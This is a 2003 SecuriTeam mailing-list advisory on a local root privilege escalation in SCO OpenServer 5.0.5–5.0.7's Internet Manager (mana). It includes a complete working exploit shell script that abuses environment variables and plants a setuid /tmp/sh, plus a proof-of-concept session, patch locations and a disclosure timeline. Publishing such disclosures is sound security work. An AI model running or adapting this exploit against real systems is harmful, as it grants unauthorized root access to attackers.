[UNIX] SCO Internet Manager Allows Local Users to Gain Root Level Privileges

From: SecuriTeam (support_at_securiteam.com)
Date: 09/17/03

  • Next message: SecuriTeam: "[EXPL] Remote rpc.mountd Exploit for xlog() Vulnerability" 
    To: list@securiteam.com
Date: 17 Sep 2003 15:38:24 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      SCO Internet Manager Allows Local Users to Gain Root Level Privileges
    ------------------------------------------------------------------------

    SUMMARY

    A vulnerability in the SCO Internet Manager (mana) allows local attackers
    to gain root privileges by redirecting certain environment variables to a
    shell binary.

    DETAILS

    Vulnerable systems:
     * OpenServer version 5.0.5 up to version 5.0.7

    The SCO Internet Manager (mana) is designed to be run via the ncsa_httpd
    on port 615 and it is password protected.

    However, running /usr/internet/admin/mana/mana locally is possible.

    By exporting the environment variable REMOTE_ADDR and setting it to
    127.0.0.1, mana can be tricked to execute the file menu.mana as if it was
    run via the nsca_httpd password protected area.

    Another interesting environment variable is PATH_INFO that tells mana what
    mana file should be executed.

    This tells us that mana will execute "hostname" when this file is run. By
    changing the environment variables PATH_INFO to /pass-err.mana and PATH to
    /:$PATH would make mana execute ./hostname with root privileges.

    The file pass-err.mana contains the following lines:

      <TCL>
      if {[catch {exec hostname} hostName] != 0} {
          set hostName localhost
      }
      set mana(localHostName) $hostName
      return {}
      </TCL>

    This tells us that mana will execute "hostname" when this file is run.

    By changing the environment variables PATH_INFO to /pass-err.mana and PATH
    to ./:$PATH would make mana execute ./hostname with root privileges.

    Example (Simple POC):
    This proof of concept for OpenServer 5.0.7 should give any local user
    euid=0(root).

    $ uname -a
    SCO_SV openserv 3.2 5.0.7 i386
    $ id
    uid=200(test) gid=50(group) groups=50(group)
    $ sh mana-root.sh
    # id
    uid=200(test) gid=50(group) euid=0(root) groups=50(group)

    Exploit mana-root.sh:
    #!/bin/sh
    #
    # OpenServer 5.0.7 - Local mana root shell
    #
    #

    REMOTE_ADDR=127.0.0.1
    PATH_INFO=/pass-err.mana
    PATH=./:$PATH

    export REMOTE_ADDR
    export PATH_INFO
    export PATH

    echo "cp /bin/sh /tmp;chmod 4777 /tmp/sh;" > hostname

    chmod 755 hostname

    /usr/internet/admin/mana/mana > /dev/null

    /tmp/sh

    Workaround:
    The proper solution is to install the latest packages.

    Location of fixed binaries:
    <ftp://ftp.sco.com/pub/updates/OpenServer/CSSA-2003-SCO.19>
    ftp://ftp.sco.com/pub/updates/OpenServer/CSSA-2003-SCO.19.

    Installing fixed binaries:
    Upgrade the affected binaries with the following sequence:

    1) Download the VOL* files to the /tmp directory

    2) Run the custom command, specify an install from media images, and
    specify the /tmp directory as the location of the images.

    Disclosure Timeline:
    9/02/2003: Vendor notified by e-mail
    9/03/2003: Vendor has verified the issue and is working on the solution
    9/15/2003: Public release

    ADDITIONAL INFORMATION

    The original advisory can be downloaded from:
    <http://www.texonet.com/advisories/TEXONET-20030902.txt>
    http://www.texonet.com/advisories/TEXONET-20030902.txt.

    The information has been provided by <mailto:advisories@texonet.com>
    Texonet.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[EXPL] Remote rpc.mountd Exploit for xlog() Vulnerability"

    Relevant Pages